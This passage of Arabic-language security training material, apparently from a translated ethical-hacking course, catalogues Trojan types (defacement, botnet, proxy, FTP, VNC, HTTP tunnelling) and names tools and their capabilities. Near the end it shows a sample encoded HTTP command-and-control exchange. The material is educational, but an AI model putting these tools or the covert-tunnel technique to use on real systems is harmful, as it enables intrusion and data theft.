‫‪ :EXECUTE‬ﯾﻘوم ﺑﺗﻧﻔﯾذ اﻟﺑراﻣﺞ أو ﻣﻠﻔﺎت اﻟﺑﺎﺗش ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر اﻟﻣﺿﯾف‪.‬‬
‫‪ :DIR‬ﯾرﺳل ﻣﺳﺎر ﻣﺣرك اﻷﻗراص أو اﻟﻣﺟﻠدات إﻟﻰ ﻋﻧوان اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟﺧﺎص ﺑك‪.‬‬
‫‪Defacement Trojans‬‬
‫‪ ,Defacement Trojans‬ﺑﻣﺟرد ﻧﺷره ﻋﻠﻰ اﻟﻧظﺎم‪ ,‬ﯾﻣﻛﻧﮫ ﺗدﻣﯾر أو ﺗﻐﯾﯾر اﻟﻣﺣﺗوى ﺑﺎﻟﻛﺎﻣل اﻟﻣوﺟودة ﻓﻲ ﻗﺎﻋدة اﻟﺑﯾﺎﻧﺎت‪.‬‬
‫‪ Defacement Trojans‬ھذه أﻛﺛر اﻟﺗروﺟﺎن ﺧطورة ﻋﻧد اﺳﺗﮭداف اﻟﻣﮭﺎﺟﻣﯾن ﻣواﻗﻊ اﻟوﯾب؛ ﺣﯾث ﻟﻧﮫ ﯾﻘوم ﺑﺗﻐﯾر ﻣﻠﺣوظ ﻓﻲ ﺗﻧﺳﯾﻖ‬
‫‪ HTML‬ﺑﺎﻟﻛﺎﻣل‪ ،‬ﻣﻣﺎ ﯾؤدى إﻟﻰ ﺗﻐﯾﯾرات ﻓﻲ ﻣﺣﺗوى ﻣوﻗﻊ اﻟوﯾب‪ ،‬وﯾﺣدث اﻟﻣزﯾد ﻣن اﻟﺧﺳﺎﺋر ﻋﻧدﻣﺎ ﯾﺳﺗﮭدف ھذا ﺗﺷوﯾﮫ أﻧﺷطﺔ اﻷﻋﻣﺎل‬
‫اﻹﻟﻛﺗروﻧﯾﺔ‪ .‬ﻓﺈﻧﮫ ﯾﺳﻣﺢ ﻟك ﺑﻌرض وﺗﺣرﯾر ﻣﺎ ﯾﻘرب ﻣن أي ﺟﺎﻧب ﻣن ﺟواﻧب ﺑراﻣﺞ‪ ، compiled Windows‬أي ﻣن اﻟﻘواﺋم إﻟﻰ ﻣرﺑﻌﺎت‬
‫اﻟﺣوار إﻟﻰ اﻻﯾوﻧﺎت‪ .‬ﻣوارد اﻟﻣﺣررﯾن ﺗﺳﻣﺢ ﻟك ﺑﻌرض‪ ،‬ﺗﺣرﯾر‪ ،‬اﺳﺗﺧراج‪ ،‬واﺳﺗﺑدال اﻟﺟﻣل اﻟﻧﺻﯾﺔ‪ ،‬واﻟﺻور اﻟﻧﻘطﯾﺔ واﻟﺷﻌﺎرات)‪(logo‬‬
‫واﻻﯾﻘوﻧﺎت ﻣن أي ﺑرﻧﺎﻣﺞ وﯾﻧدوز‪ .‬أﻧﮭﺎ ﺗﻣﻛن )‪ target-styled Custom Applications (UCAs‬ﻟﺗﺷوﯾﮫ ﺗطﺑﯾﻘﺎت وﯾﻧدوز‪ .‬ﻣﺛﺎل‬
‫‪ calc.exe‬ﺣﯾث ﯾﺟﻌﻠﮫ ﻣﺷوھﺎ ﻛﺎﻻﺗﻰ‪:‬‬

‫‪513‬‬
‫‪Defacement Trojans: Restorator‬‬

‫اﻟﻣﺻدر‪http://www.bome.com :‬‬
‫‪ Restorator‬ھو ‪ skin editor‬ﻣﺗﻌدد اﻻﺳﺗﻌﻣﺎل ﻷى ﺑرﻧﺎﻣﺞ وﯾﻧدوز ‪ .WIN32‬ھذه اﻷداة ﯾﻣﻛﻧﮭﺎ ﺗﻌدﯾل واﺟﮭﺔ اﻟﮭدف ﻷي ﺑرﻧﺎﻣﺞ‬
‫وﯾﻧدوز ‪ 32‬ﺑت‪ ،‬وﺑﺎﻟﺗﺎﻟﻲ ﯾﻧﺷﺄ)‪target-styled Custom Applications (UCAs‬أي ﺗطﺑﯾﻖ ﻣﻌدل ﻣن ﻗﺑل اﻟﻣﮭﺎﺟم‪ .‬ﯾﻣﻛﻧك ﻋرض‬
‫واﺳﺗﺧراج‪ ،‬إﺿﺎﻓﺔ أو إزاﻟﺔ‪ ،‬وﺗﻐﯾﯾر اﻟﺻور واﻷﯾﻘوﻧﺎت واﻟﻧﺻوص واﻟﺣوارات واﻷﺻوات وأﺷرطﺔ اﻟﻔﯾدﯾو‪ ،‬اﻹﺻدار‪ ،‬واﻟﻘواﺋم ﻟﺟﻣﯾﻊ‬
‫اﻟﺑراﻣﺞ ﺗﻘرﯾﺑﺎ‪.‬‬
‫ﻣن اﻟﻧﺎﺣﯾﺔ اﻟﻔﻧﯾﺔ‪ ،‬ﻓﺈﻧﮫ ﯾﺳﻣﺢ ﻟك ﺑﺎﻟﺗﻌدﯾل ﻋﻠﻰ اﻟﻣوارد ﻓﻲ اﻟﻌدﯾد ﻣن أﻧواع اﻟﻣﻠﻔﺎت‪ ،‬ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل])‪، [.ocx (Active X‬‬
‫])‪ ، [.scr (Screen Saver‬وﻏﯾرھﺎ ﻣن اﻟﻣﻠﻔﺎت‪ .‬ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟم ﺗوزﯾﻊ اﻟﺗﻌدﯾﻼت ﻋﻠﻰ اﻟﻣﻠﻔﺎت ذاﺗﯾﮫ اﻟﺗﻧﻔﯾذ اﻟﺻﻐﯾرة‪ .‬ھو ﺑرﻧﺎﻣﺞ ﻣﺳﺗﻘل‬
‫ﺑذاﺗﮫ واﻟﺗﻲ ﯾﻣﻛﻧﮫ ﻗراﺋﮫ اﻟﺗﻌدﯾﻼت اﻟﺗﻲ أدﺧﻠت ﻋﻠﻰ اﻟﺑراﻣﺞ‪ .‬وظﯾﻔﺔ اﻻﺳﺗﯾﻼء )‪ (Grab function‬ﺗﺳﻣﺢ ﻟك ﺑﺎﺳﺗرداد اﻟﻣوارد ﻣن اﻟﻣﻠﻔﺎت‬
‫ﻋﻠﻰ اﻟﻘرص اﻟﮭدف‪.‬‬
‫‪ Restorator‬ھو اﻟﻣﻧﺗﺞ اﻟراﺋد ﻟﺷرﻛﺔ ‪ boom‬واﻟذي ﯾﺳﻣﺢ ﻟك ﺑﺎﻟﺗﻌدﯾل ﻋﻠﻰ اﻟﻣوارد )اﻟﻣوارد ھﻲ اﻟﺑﯾﺎﻧﺎت اﻟﺗﻲ ﯾﻌﺗﻣد ﻋﻠﯾﮭﺎ اﻟﺗطﺑﯾﻖ واﻟذي‬
‫ﯾﻘوم اﻟﻣﺑرﻣﺞ ﺑﺿﻣﮫ ﻓﻲ اﻟﺑرﻧﺎﻣﺞ(‪ .‬ھو أداة ﻟﻠﺗﻌدﯾل ﻋﻠﻰ ﻣوارد اﻟوﯾﻧدوز ﻓﻲ اﻟﺗطﺑﯾﻘﺎت وﻣﻛوﻧﺎﺗﮭﺎ‪ ،‬ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل‪ ،‬اﻟﻣﻠﻔﺎت ﻣﻊ اﻻﻣﺗدادات‬
‫)‪ (.rc) ،(.res) ،(.dll) ،(.exe‬و )‪ .(.dcr‬ﯾﻣﻛﻧك اﺳﺗﺧدام ھذا ﻟﻠﺗرﺟﻣﺔ‪/‬اﻟﺗﻌرﯾب‪ ،‬اﻟﺗﺧﺻﯾص‪ ،‬ﺗﺣﺳﯾن اﻟﺗﺻﻣﯾم‪ ،‬واﻟﺗطوﯾر‪ .‬ﻣﺣرر اﻟﻣوارد‬
‫)‪ (resource editor‬ھذا ﯾﺄﺗﻲ ﻣﻊ واﺟﮭﺔ ‪ .intuitive target-interface‬واﻟﺗﻲ ﺗﻣﻛﻧك ﻣن اﺳﺗﺑدال اﻟﺷﻌﺎرات‪/‬اﻟﻠوﻏو واﻟﺳﯾطرة ﻋﻠﻰ‬
‫ﻣﻠﻔﺎت اﻟﻣوارد ﻓﻲ ﻋﻣﻠﯾﺔ ﺗطوﯾر اﻟﺑرﻣﺟﯾﺎت‪ .‬ﯾﻣﻛﻧﮭﺎ ان ﺗﺗدﺧل ﻓﻲ اﻟﻧظﺎم اﻟﻣﺳﺗﮭدف واﻟﺑراﻣﺞ اﻟﺗﻲ ﺗﻌﻣل ﻋﻠﯾﮭﺎ‪.‬‬
‫‪Botnet Trojans‬‬
‫‪ Botnet‬ھﻲ ﻋﺑﺎرة ﻋن ﻣﺟﻣوﻋﺔ ﻣن ‪ (Backdoor ،Trojan ،worms) software robots‬اﻟﺗﻲ ﯾﺗم ﺗﺷﻐﯾﻠﮭﺎ ﺗﻠﻘﺎﺋﯾﺎ‪ .‬ﻓﺈﻧﮫ ﯾﺷﯾر إﻟﻰ‬
‫ﻣﺟﻣوﻋﺔ ﻣن آﻻت اﻟﻣﺧﺗرﻗﺔ واﻟﺗﻲ ﺗﻘوم ﺑﺗﺷﻐﯾل اﻟﺑراﻣﺞ ﺗﺣت ﺳﯾطرة اﻷواﻣر اﻟﻌﺎﻣﺔ )‪ (Common commands‬واﻟﺑﻧﯾﺔ اﻟﺗﺣﺗﯾﺔ ﻟﻠﻘﯾﺎدة‬
‫)‪ .(Control Infrastructure‬ﻣﻧﺷﺊ ‪) Botnet‬اﻟﻣﮭﺎﺟم( ﯾﻣﻛﻧﮫ اﻟﺗﺣﻛم ﻓﻲ ﻣﺟﻣوﻋﺔ ﻣن اﻻھداف ﻋن ﺑﻌد‪ .‬ھذه اﻷھداف ھﻲ أﺟﮭزة‬
‫اﻟﻛﻣﺑﯾوﺗر )ﻣﺟﻣوﻋﺔ ﻣن أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر ﻓﻲ ﺣﺎﻟﺔ ﻏﯾﺑوﺑﺔ )‪ ( (zombie computer‬اﻟﻣﺻﺎﺑﺔ ب ‪ worms‬أو أﺣﺻﻧﺔ طروادة واﻟﻣﺳﺗوﻟﻰ‬
‫ﻋﻠﯾﮭﺎ ﺧﻠﺳﺔ ﻣن ﻗﺑل اﻟﻣﮭﺎﺟﻣﯾن وﺗﻘدﯾﻣﮭم ﻓﻲ اﻟﺷﺑﻛﺎت ﻹرﺳﺎل اﻟﺑرﯾد اﻟﻣزﻋﺞ)‪ ،(spam email‬اﻟﻔﯾروﺳﺎت‪ ،‬أو إطﻼق ھﺟﻣﺎت اﻟﺣرﻣﺎن ﻣن‬
‫اﻟﺧدﻣﺔ)‪ .(denial of services‬ھذه ھﻲ اﺟﮭزة اﻟﻛﻣﺑﯾوﺗر اﻟﺗﻲ ﺗﻣت إﺻﺎﺑﺗﮭﺎ واﻻﺳﺗﯾﻼء ﻋﻠﯾﮫ ﻣن ﻗﺑل أﺣد اﻟﻣﮭﺎﺟﻣﯾن ﺑﺎﺳﺗﺧدام‬
‫ﻓﯾروس‪/‬طروادة‪ /‬اﻟﺑرﻣﺟﯾﺎت اﻟﺧﺑﯾﺛﺔ‪.‬‬

‫‪514‬‬
‫ﻣﺎﻟﻛوا ‪ Botnet‬ﻋﺎدة ﻣﺎ ﯾﺳﺗﮭدﻓون اﻟﺷﺑﻛﺎت اﻟﺗﻌﻠﯾﻣﯾﺔ واﻟﺣﻛوﻣﯾﺔ واﻟﻌﺳﻛرﯾﺔ‪ ،‬وﻏﯾرھﺎ ﻣن اﻟﺷﺑﻛﺎت‪ .‬ﻣﻊ ﻣﺳﺎﻋدة ﻣن ‪ ،Botnet‬اﻟﮭﺟﻣﺎت ﻣﺛل‬
‫اﻟﺣرﻣﺎن ﻣن اﻟﺧدﻣﺔ‪ ،‬إﻧﺷﺎء أو إﺳﺎءة اﺳﺗﺧدام ﺑرﯾد ‪ ،SMTP‬ﻧﻘرات اﻻﺣﺗﯾﺎل‪ ،‬ﺗﻧﻔﯾذ ﺳرﻗﺔ أرﻗﺎم ﺗﺳﻠﺳل اﻟﺗطﺑﯾﻘﺎت‪ ،‬ﻣﻌرﻓﺎت ﺗﺳﺟﯾل اﻟدﺧول‪،‬‬
‫وأرﻗﺎم ﺑطﺎﻗﺎت اﻻﺋﺗﻣﺎن‪ ،‬اﻟﺦ ﯾﺗم ﺗﻧﻔﯾذھﺎ‪.‬‬
‫ﻧﺟد اﻧﮫ ﯾﺗﻛون ﻣن اﺛﻧﯾن ﻣن ﻋﻧﺎﺻر رﺋﯾﺳﯾﺔ ھﻲ‪:‬‬

‫‪- Botnet‬‬
‫‪- Botmaster‬‬
‫ﻧﺟد أﻧﮭﺎ ﺗﺳﺗﮭدف ﻛل ﻣن اﻟﺷرﻛﺎت وﻛذﻟك اﻷﻧظﻣﺔ اﻟﻔردﯾﺔ ﻟﺳرﻗﺔ اﻟﻣﻌﻠوﻣﺎت اﻟﻘﯾﻣﺔ‪ .‬ھﻧﺎك أرﺑﻌﺔ ﻣن اﻟطوﺑوﻟوﺟﯾﺎت ﻠﻠ ‪ Botnet‬ﻛﺎﻻﺗﻰ‪:‬‬
‫‪- Hierarchal‬‬
‫‪- Multi Server‬‬
‫‪- Star‬‬
‫)‪- Random (Mesh‬‬
‫‪Botnet Trojan: Illusion Bot and NetBot Attacker‬‬
‫‪ Illusion Bot‬ھﻲ أداة ذات واﺟﮭﺔ رﺳوﻣﯾﺔ واﺿﺣﺔ ﺗﺳﺗﺧدم ﻓﻲ اﻻﻋداد‪ .‬ﻋﻧدﻣﺎ ﯾﺑدأ ﻓﻲ اﻟﻌﻣل‪ ،‬ﻓﺈﻧﮫ ﯾﺗﺣﻘﻖ ﻣن إﺻدار ﻧظﺎم اﻟﺗﺷﻐﯾل ﻓﺈذا‬
‫اﻛﺗﺷف أﻧﮫ ‪ ،WIN98‬ﻓﺎﻧﮫ ﯾﺳﺗدﻋﻲ ‪ Register Service Process API‬ﻹﺧﻔﺎء اﻟﻌﻣﻠﯾﺎت ﻋن ﻣدﯾر اﻟﻣﮭﺎم‪ Bot .‬ﯾﻧﺗﻘل اﻟﻰ ﺗﺛﺑﯾت‬
‫ﻣﺣﺗوﯾﺎت ‪ .rootkit‬إذا ﻓﺷﻠت ﻋﻣﻠﯾﺔ اﻟﺗﺛﺑﯾت‪ ،‬ﻓﺎﻧﮫ ﯾﺣﺎول ﺣﻘن اﻷﻛواد اﻟﺧﺎﺻﺔ ﺑﮫ داﺧل ‪.Explorer.exe‬‬
‫اﻟﻣﻣﯾزات‪:‬‬
‫‪-‬‬ ‫‪C&C can be managed over IRC and HTTP‬‬
‫‪-‬‬ ‫)‪Proxy functionality (Socks4, Socks5‬‬
‫‪-‬‬ ‫‪FTP service‬‬
‫‪-‬‬ ‫‪MD5 support for passwords‬‬
‫‪-‬‬ ‫‪Rootkit‬‬
‫‪-‬‬ ‫‪Code injection‬‬
‫‪-‬‬ ‫‪Colored IRC messages‬‬
‫‪-‬‬ ‫‪XP SP2 Firewall bypass‬‬
‫‪-‬‬ ‫‪DDOS capabilities‬‬
‫‪ NetBot Attacker‬ﯾوﻓر واﺟﮭﺔ وﯾﻧدوز ﺑﺳﯾطﺔ ﻟﻠﺳﯾطرة ﻋﻠﻰ ‪ ،botnet‬وﺗﻘدﯾم اﻟﺗﻘﺎرﯾر وإدارة اﻟﺷﺑﻛﺔ‪ ،‬وﻗﯾﺎدة اﻟﮭﺟﻣﺎت‪ .‬ﻷﻧﮫ ﯾﺗم ﺗﺛﺑﺗﮫ‬
‫ﻋﻠﻰ اﻟﻧظﺎم ﺑطرﯾﻘﺔ ﺑﺳﯾطﺔ ﺟدا ﻣﺛل ﻣﻠف ‪ RAR‬اﻟﻣﻛون ﻣﻊ ﻗطﻌﺗﯾن‪ :‬ﻣﻠف ‪) INI‬ﯾﻧظر ﻓﯾﻣﺎ ذﻛر‪ ،‬وھو ﺟزﺋﯾﺎ ﻣﻌدل وﻏﺎﻣض( و‪.EXE‬‬
‫‪ NetBot Attacker‬اﻷﺻﻠﻲ ھو ‪backdoor‬؛ ھذه اﻷداة ﺗﺣﺗﻔظ ﺑﺎﻟﻘدرة اﻟﺗﻲ ﺗﺗﯾﺢ ﻟك ﺗﺣدﯾث اﻟﺑوت ﻟﺗﻛون ﺟزءا ﻣن ﺑﻘﯾﺔ ‪.Botnet‬‬

‫‪515‬‬
‫‪Proxy Server Trojans‬‬
‫‪ Proxy server Trojan‬ھو ﻧوع ﻣن أﻧواع أﺣﺻﻧﺔ طروادة واﻟذي ﯾﺟﻌل اﻟﻧظﺎم اﻟﮭدف ﻟﯾﻛون ﺑﻣﺛﺎﺑﺔ ﺧﺎدم ﺑروﻛﺳﻲ‪.‬‬
‫‪ ،Proxy server Trojan‬ﻋﻧد ﯾﺗم اﻹﺻﺎﺑﺔ ﺑﮫ‪ ،‬ﻓﺎﻧﮫ ﯾﺑدأ ﺑﺈﺧﻔﺎء ﻣﻠﻘم‪/‬ﺧﺎدم ﺑروﻛﺳﻲ ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺿﺣﯾﺔ‪ .‬ﺣﯾث ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟم‬
‫اﺳﺗﺧدام ھذا ﻟﺗﻧﻔﯾذ أي أﻧﺷطﺔ ﻏﯾر ﻣﺷروﻋﺔ ﻣﺛل ﺗزوﯾر ﺑطﺎﻗﺎت اﻻﺋﺗﻣﺎن وﺳرﻗﺔ اﻟﮭوﯾﺔ‪ ،‬وﺣﺗﻰ ﯾﻣﻛﻧﮫ أﯾﺿﺎ إطﻼق اﻟﮭﺟﻣﺎت اﻟﺧﺑﯾﺛﺔ ﺿد‬
‫اﻟﺷﺑﻛﺎت اﻷﺧرى‪ .‬ھذا ﯾﻣﻛﻧﮫ اﻟﺗواﺻل ﻣﻊ ﺧوادم اﻟﺑروﻛﺳﻲ اﻷﺧرى‪ ،‬وﯾﻣﻛن أﯾﺿﺎ إرﺳﺎل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟذي ﯾﺣﺗوي ﻋﻠﻰ اﻟﻣﻌﻠوﻣﺎت‬
‫ذات اﻟﺻﻠﺔ‪.‬‬
‫)‪Proxy Server Trojans: W3bPrOxy Tr0j4nCr34t0r (Funny Name‬‬
‫‪ W3bPrOxy Tr0j4nCr34t0r‬ھو ‪ Proxy server Trojan‬ﺗم ﺗطوﯾره ﻟﻛﻰ ﯾﺗم اﻟوﺻول اﻟﻰ اﻟﻧظﺎم ﻋن ﺑﻌد‪ .‬ﯾﻌدم اﻻﺗﺻﺎﻻت‬
‫اﻟﻌدﯾد ﻟﻠﻌدﯾد ﻣن اﻟﻌﻣﻼء ﺛم ﯾﻘدم ﺗﻘرﯾر ﻋن ﻋﻧﺎوﯾن ‪ IP‬واﻟﻣﻧﺎﻓذ وﯾﺗم ارﺳﺎﻟﮭﺎ اﻟﻰ ﻣﺎﻟك ھذا اﻟﺗروﺟﺎن‪.‬‬

‫‪516‬‬
‫‪FTP Trojans‬‬
‫‪ FTP Trojan‬ھو ﻧوع ﻣن أﻧواع أﺣﺻﻧﺔ طروادة واﻟﺗﻲ ﺻﻣﻣت ﻟﻔﺗﺢ اﻟﻣﻧﻔذ ‪ 21‬وﺟﻌل اﻟﻧظﺎم اﻟﻣﺳﺗﮭدف ﺳﮭل اﻟوﺻول ﻣن ﻗﺑل اﻟﻣﮭﺎﺟم‪.‬‬
‫ﻷﻧﮫ ﯾﺛﺑت ﺧﺎدم ‪ FTP‬ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﻣﺳﺗﮭدف‪ ،‬ﻣﻣﺎ ﯾﺳﻣﺢ ﻟﻠﻣﮭﺎﺟﻣﯾن اﻟوﺻول إﻟﻰ اﻟﺑﯾﺎﻧﺎت اﻟﺣﺳﺎﺳﺔ وﺗﻧزﯾل‪/‬ﺗﺣﻣﯾل اﻟﻣﻠﻔﺎت‪/‬اﻟﺑراﻣﺞ ﻣن ﺧﻼل‬
‫ﺑروﺗوﻛول ‪ .FTP‬ﺑﺎﻹﺿﺎﻓﺔ إﻟﻰ ذﻟك‪ ،‬ﯾﻘوم أﯾﺿﺎ ﺗﺛﺑﯾت اﻟﺑراﻣﺞ اﻟﺿﺎرة ﻋﻠﻰ اﻟﻧظﺎم اﻟﮭدف‪ .‬ﯾﻣﻛن أﯾﺿﺎ ﺟﻣﻊ ﻣﻌﻠوﻣﺎت ﺑطﺎﻗﺎت اﻻﺋﺗﻣﺎن‪،‬‬
‫واﻟﺑﯾﺎﻧﺎت اﻟﺳرﯾﺔ وﻋﻧﺎوﯾن اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ وﻛﻠﻣﺔ اﻟﻣرور ﻋﻧدﻣﺎ ﯾﻛزن اﻟﻣﮭﺎﺟم ﻗد ﻛﺳب اﻟوﺻول إﻟﻰ اﻟﻧظﺎم‪.‬‬
‫‪FTP Trojan: TinyFTPD‬‬
‫‪VNC Trojans‬‬
‫‪ VNC Trojans‬ﯾﺳﻣﺢ ﻟﻠﻣﮭﺎﺟﻣﯾن ﻻﺳﺗﺧدام اﻟﻛﻣﺑﯾوﺗر اﻟﮭدف ﺑﺎﻋﺗﺑﺎره ﺧﺎدم‪ . VNC‬ﻟن ﯾﺗم اﻟﻛﺷف ﻋن أﺣﺻﻧﺔ طروادة ھذه ﻣن ﻗﺑل‬
‫ﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ اﻟﻔﯾروﺳﺎت ﺑﻌد ﺗﺷﻐﯾﻠﮭﺎ‪ ،‬ﻷﻧﮭﺎ ﺗﻌﺗﺑر ﺧﺎدم‪ VNC‬أداة‪.‬‬
‫ﯾؤدي اﻟﻣﮭﺎم اﻟﺗﺎﻟﯾﺔ ﻋﻧدﻣﺎ ﯾﺻﯾب اﻟﻧظﺎم‪:‬‬
‫‪ -‬ﯾدا ﺧﺎدم ‪ (VNC daemon) VNC‬اﻟﻌﻣل ﻓﻲ اﻟﺧﻠﻔﯾﺔ ﻋﻧد اﻟﻣﺻﺎﺑﯾن‪.‬‬
‫‪ -‬ﯾﺗﺻل اﻟﮭدف ﺑﺎﺳﺗﺧدام أي ﻣن ‪ VNC viewer‬ﻣﻊ ﻛﻠﻣﺔ اﻟﺳر "‪"secret‬‬

‫‪517‬‬
‫‪VNC Trojans: WinVNC and VNC Stealer‬‬
‫‪ WinVNC‬و ‪ VNC Stealer‬ھﻣﺎ ﻧوﻋﯾن ﻣن أﻧواع ‪.VNC Trojan‬‬

‫‪WinVNC -‬‬
‫‪ WinVNC‬ﯾﺳﺗﺧدم ﻟﻠﺣﺻول ﻋﻠﻰ ﻋرض ﻋن ﺑﻌد أو ﻟﻠﺳﯾطرة ﻋﻠﻰ آﻟﺔ ‪ Widows‬ﺑﺣﯾث ﯾﺻﺑﺢ ھذا اﻟﺗﮭدﯾد ﺣﯾث ان اﻟﻣﮭﺎﺟﻣﯾن ﻗﺎدرون‬
‫ﻋﻠﻰ ﺣﻘن ﺣﺻﺎن طروادة ﻓﻲ اﻟﻧظﺎم وﻣن ﺛم ﻓﮭﻲ ﻗﺎدرة ﻋﻠﻰ اﻟوﺻول إﻟﻰ اﻟﻧظﺎم اﻟﮭدف ﻋن ﺑﻌد‪.‬‬
‫‪VNC Stealer -‬‬
‫‪ VNC Stealer‬ھو ﺣﺻﺎن طروادة ﻣﻛﺗوب ﺑواﺳطﺔ ‪ .Visual Basic‬ﯾﺗم اﺳﺗﺧدم ‪ VNC.EXE‬ﻷداء اﻟﺳﻠوك اﻟﺗﺎﻟﻲ‪:‬‬
‫‪ -‬اﻟﻌﻣﯾﻠﺔ ﯾﺗم ﺗﻌﺑﺋﺗﮭﺎ و‪/‬أو ﺗﺷﻔﯾرھﺎ ﺑﺎﺳﺗﺧدام ‪.software packing process‬‬
‫‪ -‬ﯾﻧﺷﺄ ‪ ،system tray pop-ups‬اﻟرﺳﺎﺋل‪ ،‬اﻷﺧطﺎء‪ ،‬واﻟﺗﺣذﯾرات اﻷﻣﻧﯾﺔ‪.‬‬
‫‪ -‬ﯾﺿﯾف اﻟﻣﻧﺗﺟﺎت إﻟﻰ ﺳﺟل اﻟﻧظﺎم)‪. (system registry‬‬
‫‪ -‬ﯾﻛﺗب إﻟﻰ ‪(process hijacking) Process's Virtual Memory‬‬
‫‪ -‬ﯾﻧﻔذ اﻟﻌﻣﻠﯾﺔ‬
‫‪ -‬ﯾﺧﻠﻖ ﻣﺟﻠدات ﺟدﯾدة ﻋﻠﻰ اﻟﻧظﺎم‪.‬‬
‫‪ -‬ھذه اﻟﻌﻣﻠﯾﺔ ﯾﻣﻛﻧﮭﺎ ﺣذف اﻟﻌﻣﻠﯾﺎت اﻷﺧرى ﻣن اﻟﻘرص‬
‫‪ -‬ﯾﻘوم ﺑزرع ‪ process hooks code‬ﻓﻲ ﺟﻣﯾﻊ ﻋﻣﻠﯾﺎت اﻟﺗﺷﻐﯾل‪ ،‬واﻟﺗﻲ ﯾﻣﻛن أن ﺗﺳﻣﺢ ﻟﮭﺎ ﺑﺎﻟﺳﯾطرة ﻋﻠﻰ اﻟﻧظﺎم أو ﺗﺳﺟﯾل‬
‫ﺿرﺑﺎت ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ‪ ،‬ﻧﺷﺎط اﻟﻣﺎوس‪ ،‬وﻣﺣﺗوﯾﺎت اﻟﺷﺎﺷﺔ‪.‬‬
‫‪ -‬ﯾﺳﺟل ‪.Dynamic Link Library File‬‬
‫‪HTTP/HTTPS Trojans‬‬
‫‪ HTTP/HTTPS Trojans‬ﯾﻣﻛﻧﮫ ﺗﺟﺎوز أي ﻣن ﺟدران اﻟﺣﻣﺎﯾﺔ‪ ،‬وﯾﻌﻣل ﻓﻲ اﻟطرﯾﻖ اﻟﻌﻛﺳﻲ )‪ (reverse way‬ﻟﻧﻔﻖ ‪HTTP‬‬
‫)‪ .(HTTP tunnel‬ﺗﺳﺗﺧدم اﻟواﺟﮭﺎت اﻟﻘﺎﺋﻣﺔ ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت واﻟﻣﻧﻔذ ‪ .80‬ﯾﺗم ﺗﻧﻔﯾذ أﺣﺻﻧﺔ طروادة ھذه ﻋﻠﻰ اﻟﻣﺿﯾف اﻟداﺧﻠﯾﺔ وﺗﻘوم‬
‫ﺑﺗﻔرﯾﺦ)‪ child (spawn‬ﻛل ﯾوم ﻓﻲ وﻗت ﻣﻌﯾن‪ .‬ﺣﯾث ﺑرﻧﺎﻣﺞ ‪ child‬ھذا ﯾظﮭر ﻟﻛﻲ ﯾﺳﺗﮭدف ﺟدران اﻟﺣﻣﺎﯾﺔ واﻟذي‪ ،‬ﺑدوره‪ ،‬ﯾﺳﻣﺢ ﻟﮭﺎ‬
‫ﻟﻠوﺻول إﻟﻰ اﻹﻧﺗرﻧت‪ .‬وﻣﻊ ذﻟك‪ ،‬ﺑرﻧﺎﻣﺞ ‪ child‬ھذا ﯾﻘوم ﺑﺗﺷﻐﯾل ﻗذﯾﻔﺔ ﻣﺣﻠﯾﺔ)‪ ، (local shell‬واﻟﺗﻲ ﯾرﺗﺑط ﺑﺧﺎدم اﻟوﯾب اﻟذي ﯾﻣﻠك‬
‫اﻟﻣﮭﺎﺟﻣﯾن ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت ﻣن ﺧﻼل طﻠب ‪ HTTP‬ﻣﺷروع‪ ،‬وﯾرﺳل إﺷﺎرة ﺟﺎھزة‪ .‬اﻟﺟواب ﻋﻠﻰ طﻠﻲ ‪ HTTP‬اﻟﻣﺷروع ﻣن ﺧﺎدم‬
‫اﻟوﯾب اﻟﺧﺎص ﺑﺎﻟﻣﮭﺎﺟم ھو ﻓﻲ اﻟواﻗﻊ ﺳﻠﺳﻠﺔ ﻣن اﻷواﻣر اﻟﺗﻲ ﯾﻣﻛن ﻠﻠ‪ child‬ﺗﻧﻔﯾذھﺎ ﻋﻠﻰ اﻟﻘذﯾﻔﺔ اﻟﻣﺣﻠﯾﺔ )‪ (local shell‬ﻋﻠﻰ ﺟﮭﺎز‬
‫اﻟﺿﺣﯾﺔ‪ .‬ﯾﺗم ﺗﺣوﯾل ﻛل ﺣرﻛﺔ ﻣرور اﻟﺷﺑﻛﺔ )‪ (traffic‬اﻟﻰ ﺑﻧﯾﺔ ﺷﺑﯾﮫ ﻠ ‪ BASE64‬وﺗﻌطﻰ ﻛﻘﯾﻣﺔ ﻠ‪ ،cgi-string‬ﻟذﻟك ﯾﻣﻛن اﻟﻣﮭﺎﺟم ﻣن‬
‫ﺗﺟﻧب اﻟﻛﺷف‪ .‬وﻓﯾﻣﺎ ﯾﻠﻲ ﻣﺛﺎل ﻋﻠﻰ اﺗﺻﺎل‪:‬‬

‫‪518‬‬
‫‪Slave: GET/cgi-bin/order? M5mAejTgZdgYOdgIOoBqFfVYTgjFLdgxEdb1He7krj HTTP/1 .0‬‬

‫‪Master replies with: g5mAlfbknz‬‬
‫‪ GET‬ﻟﻠﻣﺿﯾف اﻟداﺧﻠﻲ )‪ (slave‬ھو ﻓﻘط ﻣوﺟﮫ اﻷواﻣر)‪ (command prompt‬ﻣن اﻟﻘذﯾﻔﺔ ﺷل؛ اﻟﺟواب ھو اﻟﺗرﻣﯾز ﻟﻸﻣر "‪ "ls‬ﻣن‬
‫اﻟﻣﮭﺎﺟم ﻋﻠﻰ اﻟﺧﺎدم اﻟﺧﺎرﺟﻲ )‪ SLAVE .(MASTER‬ﯾﺣﺎول اﻻﺗﺻﺎل ﯾوﻣﯾﺎ ﻓﻲ وﻗت ﻣﺣدد إﻟﻰ ‪ .MASTER‬وإذا ﻟزم اﻷﻣر‪ ،‬ﯾﺗم‬
